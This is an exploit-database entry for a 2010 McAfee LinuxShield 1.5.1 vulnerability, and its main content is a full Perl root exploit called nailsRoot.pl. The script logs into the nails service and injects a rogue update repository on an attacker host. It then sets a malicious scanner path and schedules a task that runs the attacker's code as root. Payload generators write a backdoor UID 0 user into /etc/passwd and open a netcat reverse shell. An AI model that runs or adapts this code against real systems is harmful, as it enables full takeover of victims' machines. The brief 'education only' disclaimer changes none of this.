Description
McAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution
{"lastseen": "2020-04-01T19:04:30", "references": [], "description": "\nMcAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution", "edition": 1, "reporter": "Nikolas Sotiriu", "exploitpack": {"type": "webapps", "platform": "linux"}, "published": "2010-08-27T00:00:00", "title": "McAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-27T00:00:00", "id": "EXPLOITPACK:8ABEE41D6D37EDDDDE4E2879A2DF8C6F", "href": "", "viewCount": 2, "sourceData": "#!/usr/bin/perl\n\n##\n# Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit\n# Name: nailsRoot.pl\n# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>\n# WARNING: This Exploit deletes the default Update Server\n#\n# Use it only for education or ethical pentesting! The author accepts \n# no liability for damage caused by this tool.\n# \n##\n\nuse strict;\nuse IO::Socket::SSL;\nuse Getopt::Std;\n\nmy %args;\nmy $ack;\nmy $timestamp;\n\ngetopt('h:p:u:v:e:a:g:', \\%args);\n\nmy $gen_exec = $args{g};\n\nif (defined $gen_exec) {\n\tgenEx($gen_exec);\n}\n\nmy $target_host = $args{h} || usage();\nmy $target_port = $args{p} || 65443;\nmy $nails_user = $args{u} || usage();\nmy $nails_pass = $args{v} || \"\";\nmy $exec_path = $args{e} || \"/opt/McAfee/cma/scratch/update/catalog.z\";\nmy $my_host = $args{a} || \"\";\n\nmy $range = 50000000;\nmy $minimum = 90000000;\n\nmy $randomtask = int(rand($range)) + $minimum;\n\nmy $pre=\"sconf ODS_99 \";\nmy $post=\"\\x0d\\x0a\";\n\nmy $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\\ version=\"1.0\"\\ encoding=\"UTF-8\"?><ns:SiteLis'.\n 'ts\\ xmlns:ns=\"naSiteList\"\\ GlobalVersion=\"20030131003110\"\\ LocalVersion=\"20091209161903\"\\ Type=\"Clie'.\n 'nt\"><SiteList\\ Default=\"1\"\\ Name=\"SomeGUID\"><HttpSite\\ Type=\"repository\"\\ Name=\"EvilRepo\"\\ Order=\"1\"'.\n '\\ Server=\"';\n\nmy $setrepo2=':80\"\\ Enabled=\"1\"\\ Local=\"1\"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.\n 'h><UserName></UserName><Password\\ Encrypted=\"0\"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';\n\nmy $setsite=\"task setsitelist\";\n\nmy $begin=\"begin\";\n\nmy$set=\"set \";\nmy $profile=\" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60\".\n \" nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS\".\n \"_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.\".\n \"ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof\".\n \"ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so\".\n \" nailsd.profile.ODS_99.factoryInitT\".\n \"mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p\".\n \"rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails\".\n \"d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran\".\n \"tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan\".\n \"Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil\".\n \"e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=\".\n \"$exec_path\".\n \" nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl\".\n \"owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat\".\n \"h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all \".\n \"nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=\".\n \"Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri\".\n \"mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou\".\n \"t=Pass nailsd.profile.ODS_99.action.error=Block\";\n\nmy $commit=\"commit \";\n\nmy $setdb=\" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,\".\n \"paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert\";\n\t#update _where= i_taskId=2\";\n\nmy $execupd=\"task nstart LinuxShield Update\";\nmy $execute=\"task nstart $randomtask\";\n\nbanner();\n\nif ($exec_path eq \"/opt/McAfee/cma/scratch/update/catalog.z\") {\n\tif ($my_host eq \"\") {\n\t\tusage();\n\t}\n\tstOne();\n}else{\n\tstTwo();\n}\n\nsub stOne {\n\tmy $reposock = IO::Socket::SSL->new(\n PeerAddr => $target_host,\n PeerPort => $target_port,\n Proto => 'tcp',\n );\n\n\tif (defined $reposock) {\n\t\tprint \"[*] Executing Stage One\\n\";\n\t\tprint \"-----------------------\\n\";\t\t\n\n $ack=<$reposock>;\n print $ack;\n\n print $reposock \"auth \".$nails_user.\" \".$nails_pass.$post;\n $ack=<$reposock>;\n if ($ack=~m/ERR authentication failure/){\n print \"[-] Authentication failed...\\n\";\n exit(1);\n }\n print $ack;\n sleep(1);\n\n print \"[+] Repo update: inject evil repo\\n\";\n print $reposock $setrepo1.$my_host.$setrepo2.$post;\n sleep(1);\n\n print \"[+] Repo Site update: update site task\\n\";\n print $reposock $setsite.$post;\n $ack=<$reposock>;\n print $ack;\n sleep(1);\n\n print \"[+] Execute AV Update: downloading evil code\\n\";\n print $reposock $execupd.$post;\n sleep(5); # Update needs a bit time\n\t\t$reposock->shutdown(1);\n\t\t\n\t}\n\tstTwo();\n}\n\nsub stTwo {\n my $sock = IO::Socket::SSL->new(\n PeerAddr => $target_host,\n PeerPort => $target_port,\n Proto => 'tcp',\n );\n\n\tif (defined $sock) {\n print \"\\n\\n[*] Executing Stage TWO\\n\";\n print \"-----------------------\\n\";\n\n\t\t$ack=<$sock>;\n\t\tprint $ack;\n\t\t\n\t\tprint $sock \"auth \".$nails_user.\" \".$nails_pass.$post;\n\t\t$ack=<$sock>;\n\t\tif ($ack=~m/ERR authentication failure/){\n\t\t\tprint \"[-] Authentication failed...\\n\";\n\t\t\texit(1);\n\t\t}\n\t\tprint $ack;\n\t\tsleep(1);\n\n\t\tprint $sock $pre.$begin.$post;\n\t\t$ack=<$sock>;\n\t\tprint $ack;\n\t\t\t$ack=~s/\\+OK //g;\n\t\t\t$timestamp=$ack;\n\t\t\t$timestamp=~ s/\\s+$//;\n\t\t\tprint \"[+] Timestamp: $timestamp\\n\";\n\t\tprint \"[+] Profile: Injecting evil Profile\\n\";\n\t\tprint $sock $pre.$set.$timestamp.$profile.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Commit: Profile changes\\n\";\n\t\tprint $sock $pre.$commit.$timestamp.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Schedule: Injecting evil task $randomtask\\n\";\n\t\tprint $sock \"db set \".$timestamp.$setdb.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Excute: Task $randomtask\\n\";\n\t\tprint $sock $execute.$post;\n\t\t$sock->shutdown(1);\n\t\tprint \"[+] Done... Check whatever you did\\n\";\n\t} else {\n \t print \"[-] some troubles with connection: $!\\n\" ;\n\t}\n}\n\nsub usage {\n\n print \"\\n\";\n print \" nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\\n\";\n print \"===============================================================\\n\\n\";\n print \" Usage:\\n\";\n print \" $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\\n\";\n print \" Optional:\\n\";\n print \" -a <attacker host with httpd>\\n\";\n print \" -e <executable file on target host>\\n\";\n print \" -p <target port (default: 65443)>\\n\";\n print \" -g (1|2) <generat shell scripts to execute>\\n\";\n print \" 1 <UID 0 user add>\\n\";\n print \" 2 <reverse nc shell>\\n\";\n print \" Notes:\\n\";\n print \" -We can not handle arguments given to executable\\n\";\n print \" in the -e option.\\n\";\n print \" -To download your own evil executable, start a httpd\\n\";\n print \" and set the -a option. Create the directory <nai> in\\n\";\n print \" your wwwroot and rename your executable to <catalog.z>\\n\";\n print \" Author:\\n\";\n print \" Nikolas Sotiriu (lofi)\\n\";\n print \" url: www.sotiriu.de\\n\";\n print \" mail: lofi[at]sotiriu.de\\n\";\n print \"\\n\";\n\n\n exit(1);\n}\n\nsub genEx {\n my ($code)=@_;\n \n if ($code==1) {\n print STDERR << \"EOF\";\n\n============== UID 0 user add ==============\n\nCopy this lines to the catalog.z file.\n\nUSER=haxxor PASS=haxxorPass\n\n-------------- cut -------------- \n#!/bin/sh\necho haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd\n-------------- /cut -------------- \n\nEOF\n \n } elsif ($code==2) {\n print STDERR << \"EOF\";\n\n============== reverse nc shell ==============\n\nCopy this lines to the catalog.z file.\n\n-------------- cut --------------\n#!/bin/sh\nnc -nv <yourip> 4444 -e /bin/sh\n-------------- /cut --------------\n\nEOF\n\n }\n\n\texit(1);\n\n}\n\nsub banner {\n\tprint STDERR << \"EOF\";\n--------------------------------------------------------------------------------\n nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n--------------------------------------------------------------------------------\n \n 111 1111111 \n 11100 101 00110111001111 \n 11101 11 10 111 101 1001111111 \n 1101 11 00 10 11 11 111 1111111101 \n 10111 1 10 11 10 0 10 1 1 1 1111111011 \n 1111 1 1 10 0 01 01 01 1 1 111 1111011101 \n 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 \n 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 \n 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 \n 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 \n 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 \n 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 \n 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 \n 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 \n 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 \n 111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111 \n 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 \n 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 \n 11 1100 10110110 10001 11101111111111111111 10 111 11100 \n 111 00 1011101 00101 0 11111111111111111001 11 111101 \n 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 \n 11 00 0 1011 100001 101000 1 1001 00001111 01 \n 01101 11111 1011 01100 0101 110 11 10 \n 10111 1 0 01 0000011 10 10 \n 10011 11100 1111 101 11 \n 1110 01 101011 1001100 \n 1111000011 1 111 \n 11000001111 \n 1 \n\nEOF\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645767482}}
{}
McAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution